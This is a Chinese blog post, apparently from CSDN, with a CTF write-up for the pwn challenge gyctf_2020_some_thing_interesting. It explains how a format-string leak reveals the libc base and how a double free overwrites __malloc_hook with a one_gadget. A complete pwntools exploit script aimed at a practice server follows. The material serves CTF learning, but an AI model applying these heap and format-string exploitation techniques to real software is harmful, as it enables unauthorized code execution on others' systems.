gyctf_2020_some_thing_interesting(fmt泄露libc,doublefree)

最新推荐文章于 2023-05-09 19:59:44 发布
最新推荐文章于 2023-05-09 19:59:44 发布
阅读量428 收藏 1
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121306153
版权

gyctf_2020_some_thing_interesting:

保护全开
请添加图片描述

漏洞分析:

字符串只比较到第14个,还有5个我们可以任意填
请添加图片描述
这里有个格式化字符串漏洞
请添加图片描述
指针未清零
请添加图片描述

漏洞利用:

gbd调试可以看到偏移的地址指向啥,例如偏移17,指向__libc_start_main+240,我们靠此泄露libc
再利用doublefree,分配chunk到malloc_hook-0x23中,改malloc_hook为og
去getshell

exp:

这题free时会释放两个堆,甚至帮我们绕过doublefree的检查

from pwn import *
#from LibcSearcher import * 
local_file  = './gyctf_2020_some_thing_interesting'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29792 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):
     gdb.attach(r,cmd)

#-----------------------
def check():
        sla('Now please tell me what you want to do :','0')
def add(o_length,o_content,re_length,re_content):
        sla('Now please tell me what you want to do :','1')
        sla('O\'s length : ',str(o_length))
        sa('> O : ',o_content)
        sla('> RE\'s length : ',str(re_length))
        sa('> RE : ',re_content)
def edit(index,o_content,re_content):
        sla('Now please tell me what you want to do :','2')
        sla('Oreo ID : ',str(index))
        sa('> O : ',o_content)
        sa('> RE : ',re_content)
def delete(index):
        sla('Now please tell me what you want to do :','3')
        sla('Oreo ID : ',str(index))
def show(index):
        sla('Now please tell me what you want to do :','4')
        sla('Oreo ID : ',str(index))

#-----------------------
sla('Input your code please:','OreOOrereOOreO%17$p')
check()
ru('Your Code is OreOOrereOOreO0x')
libc_base=int(rc(12),16)-240-libc.sym['__libc_start_main']
malloc_hook=libc_base+libc.sym['__malloc_hook']
#realloc=libc_base+libc.sym['realloc']
og=o_g_old[3]+libc_base
print hex(libc_base)
add(0x60,'a',0x60,'b')
delete(1)
delete(1)
edit(1,p64(0),p64(malloc_hook-0x23))
add(0x60,p64(0),0x68,'a'*0x13+p64(og))
sla('Now please tell me what you want to do :','1')
sla('O\'s length : ',str(0x10))
#debug()
r.interactive()

其他:

感觉调试总是我的短板
跟着这位师傅调
https://blog.csdn.net/mcmuyanga/article/details/114643601
感觉不是很好找
各位师傅可有更好的办法?
请添加图片描述

Nq0inaen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF泄漏libc基址的方法
liucc09的博客
01-05 3984
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
FMT.rar_FMT_FMT matlab_The Number_filter coefficient
09-22
this code is used to implement FMT Filter bank trancsiver in matlab. the filter coefficient can be changed also the number of subcarriers.
[BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
mcmuyanga的博客
03-11 837
gyctf_2020_some_thing_interesting 附件 步骤 例行检查,64位程序,保护全开 本地试运行一下程序,看看大概的情况 64位ida载入 sub_B7A() check() create()
gyctf_2020_some_thing_interesting
z1r0的博客
02-21 368
gyctf_2020_some_thing_interesting 查看保护 这里有一个格式化漏洞 还有uaf。 攻击思路:先借助格式化漏洞输出libc。偏移为17上是libc上的数据,因为是libc2.23下的,所以利用fastbin attack将地址任意申请到malloc_hook - 0x23这里,接着改hook为gadget即可。具体的利用手法看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level
【buuoj】gyctf_2020_some_thing_interesting1
qq_42220888的博客
12-27 113
buuoj gyctf_2020_some_thing_interesting 1 做题有感
FMT.rar_FMT_VHDL 数字频率计_数字频率计
09-20
《基于VHDL的数字频率计设计与FPGA通信模块详解》 数字频率计是电子工程领域中一种常用的测量工具,用于精确测量信号的频率。在现代数字系统设计中,利用可编程逻辑器件(PLD),如Field Programmable Gate Array...
MPEG.rar_mpeg 视频_yv12_视频回放
09-23
标题"MPEG.rar_mpeg 视频_yv12_视频回放"暗示了这个压缩包包含与MPEG视频格式和YV12色彩空间相关的资源,特别是关于如何回放YV12编码的视频内容。这里我们将深入探讨MPEG视频编码标准以及YV12色彩空间,并提供关于...
FILE_CLASS.rar_c++文件操作类_file cla
09-24
void writeFormat(const char* fmt, ...); ``` 这个自定义的`FileOperation`类将使得文件操作更加模块化,易于维护和测试。在实际项目中,我们可以通过继承这个基类,为不同类型的文件(如文本、二进制、XML等)...
gdb-commands.zip_Quick_gdb_unix commands
09-19
- `x/fmt addr`: 显示内存区域,fmt为格式(如x为十六进制),addr为内存地址。 5. **堆栈与调用** - `backtrace`: 显示调用堆栈。 - `frame n`: 选择堆栈中的第n个帧。 - `up`: 移动到调用者帧。 - `down`: ...
【buu刷题】gyctf_2020_some_thing_interesting
m0_73756460的博客
05-09 117
【buu刷题】gyctf_2020_some_thing_interesting
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 804
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的堆的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
gyctf_2020_some_thing_exceting
m0_73756460的博客
03-19 143
buu刷题 gyctf_2020_some_thing_exceting【write up】
GYCTF2020_Writeup
Lethe's Blog
03-15 2559
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
【buuctf】gyctf_2020_some_thing_exceting
weixin_51055545的博客
07-22 326
主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个堆头;程序申请的0x10的堆块起到了存放指针的作用,很正常的堆布局,直接doublefree,去改指针;64位程序,关闭了pie保护,直接放到ida分析;这里注意要劫持的堆地址为s-0x10,此时;连续申请两次,再show,即可读出flag.将堆块释放后,未将指针置空,存在uaf;先申请2个查看堆布局;漏洞点在删除功能处,...
BUUCTF:[GYCTF2020]Blacklist
末初的CSDN博客
11-09 442
https://buuoj.cn/challenges#[GYCTF2020]Blacklist 和强网杯那道随便注一样,只不过过滤更多了 return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); ?inject=1';show databases--+ ?inject=-1';show tables;--+ ?inject=-1';show colu
gyctf_2020_borrowstack
qq_42728977的博客
04-12 544
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
c++堆题double free
tbsqigongzi的博客
10-17 877
ciscn_2019_ne_2
lv_label_set_text_fmt参数说明
最新发布
04-26
lv_label_set_text_fmt是LittlevGL库中用于设置标签(Label)文本的函数,它可以根据格式化字符串设置标签的文本内容。该函数的参数说明如下: 1. label:要设置文本的标签对象。 2. fmt:格式化字符串,用于指定文本的格式和内容。 3. ...:可变参数列表,用于替换格式化字符串中的占位符。 格式化字符串中的占位符可以使用类似于printf函数的格式化规则,常见的占位符包括: - %d:整数类型 - %f:浮点数类型 - %s:字符串类型 - %c:字符类型 示例代码如下: ``` lv_label_set_text_fmt(label, "Hello, %s! Today is %dth day.", "John", 10); ``` 上述代码将会将标签的文本设置为"Hello, John! Today is 10th day."。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值